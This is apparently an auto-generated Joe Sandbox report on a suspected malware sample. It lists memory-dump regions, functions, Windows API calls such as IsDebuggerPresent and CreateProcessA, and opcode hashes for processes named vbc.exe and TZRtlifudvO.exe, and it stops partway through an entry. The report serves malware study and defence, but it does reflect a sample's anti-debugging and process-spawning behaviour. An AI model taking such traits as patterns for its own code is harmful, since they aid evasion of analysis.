Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3fce2aa057cf12c32380402843711261ecab95164e1615db8a61de1b620aab
Instruction ID: 3cc8c1a02ee92a18d5132e88da56016a87c6a269c7472e6c1f9618c324ca1312
Opcode Fuzzy Hash: fb3fce2aa057cf12c32380402843711261ecab95164e1615db8a61de1b620aab
Instruction Fuzzy Hash: 5FD0E234E0000DCBCB20DFB8E4458DCBFB0EF88321F10502AD525A3251CA3058908FA0

Function 07006C58 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d6d93c60f8b40c2f762fd68ad40ddbe322a63df506dcd9b9de36adb59b25b38
Instruction ID: 7b756ef2010792940eb6d980053403721e350f6a36331d89062fbf7423033332
Opcode Fuzzy Hash: 7d6d93c60f8b40c2f762fd68ad40ddbe322a63df506dcd9b9de36adb59b25b38
Instruction Fuzzy Hash: 1EC012309843094AC689EB75FE49915371EEA902047D0562CA00B0659EEFBC58C986E5

Non-executed Functions

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,06CA18E0), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(06CA1670), ref: 00414050

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

KERNEL32, xrefs: 00413610
IsProcessorFeaturePresent, xrefs: 0041361F

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Function 07006E28 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 07006E66
\;]q, xrefs: 07006E34
\;]q, xrefs: 07006E5A
\;]q, xrefs: 07006E3E

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: 4234b3381f40cc17de93b8538e715124579e610d114f20f665f260ecdebc5cf2
Instruction ID: aaea91d461be86b0783fab6312338bd200daf59dcc25368eb368ccea23fbf110
Opcode Fuzzy Hash: 4234b3381f40cc17de93b8538e715124579e610d114f20f665f260ecdebc5cf2
Instruction Fuzzy Hash: 0101B1B17502568FA7A48E2CC48492973EBAF89778F15466AE501CB3F4DA33DC5187D0

Analysis Process: TZRtlifudvO.exePID: 7252, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	12.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	176
Total number of Limit Nodes:	10

Executed Functions

Function 0228DDB8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0228DE36
GetCurrentThread.KERNEL32 ref: 0228DE73
GetCurrentProcess.KERNEL32 ref: 0228DEB0
GetCurrentThreadId.KERNEL32 ref: 0228DF09

Memory Dump Source

Source File: 0000000A.00000002.2129942537.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2280000_TZRtlifudvO.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 52c35e485bcd61064fa7895c1bfca433993b4870e17a57aaa33e09691a1d7fa0
Instruction ID: 6e9129b509dd257102e052d3b704d4b1b1a0e797f6982f256672ec2a0ea05f55
Opcode Fuzzy Hash: 52c35e485bcd61064fa7895c1bfca433993b4870e17a57aaa33e09691a1d7fa0
Instruction Fuzzy Hash: DE5149B09013498FDB54EFAAD548B9EBBF5EF48314F208469E009A7391D738A984CB65

Function 0568A544 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0568A786

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 263b9ae49f48b8d20c0ea81cdfdbc8f3f2ae5b5f52f9854559113fd2d9b400cb
Instruction ID: d5d6e54c5c2540b9507ee682c047e3b50869a427e76f53034855ea67d0ff013d
Opcode Fuzzy Hash: 263b9ae49f48b8d20c0ea81cdfdbc8f3f2ae5b5f52f9854559113fd2d9b400cb
Instruction Fuzzy Hash: 33A17B71D00219DFEB20DFA8C844BEDBBB2BF48314F14826AD809A7394DB749985CF91

Function 0568A550 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0568A786

Memory Dump Source

Source File: 0000000A.00000002.2135397878.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5680000_TZRtlifudvO.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 46a81fd3ed98ace3ca702df596b9c72e8008f8cc32c7006188add59527fc62d5
Instruction ID: 62b1d3874c44b994c585a2837f2c0bdf3d5cf33dd7c60f1e1d2cbb01bf323290
Opcode Fuzzy Hash: 46a81fd3ed98ace3ca702df596b9c72e8008f8cc32c7006188add59527fc62d5
Instruction Fuzzy Hash: 6B916B71D00219DFEB24DFA8C845BEDBBB2BF48314F14826AD809A7344DB759985CF91

Function 02285D0D Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02285DC9

Memory Dump Source

Source File: 0000000A.00000002.2129942537.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2280000_TZRtlifudvO.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 30702f026893386951419a7058a6dd0ef3393550024f1de81c16cdef0828849e
Instruction ID: 5b9995fc9ac304ea4e1f1990f2273036cfe8f9a7c619f01778083677cbce89ce
Opcode Fuzzy Hash: 30702f026893386951419a7058a6dd0ef3393550024f1de81c16cdef0828849e
Instruction Fuzzy Hash: 5E41F1B1C00619CFDB24DFA9C884B8EBBF5FF48304F20816AD408AB255DB756946CF91

Function 0228454C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02285DC9

Memory Dump Source

Source File: 0000000A.00000002.2129942537.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2280000_TZRtlifudvO.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: dad60e3e2985d77680d543da6fd2b4757642aac1c8c6e90ebe554119e7b00123
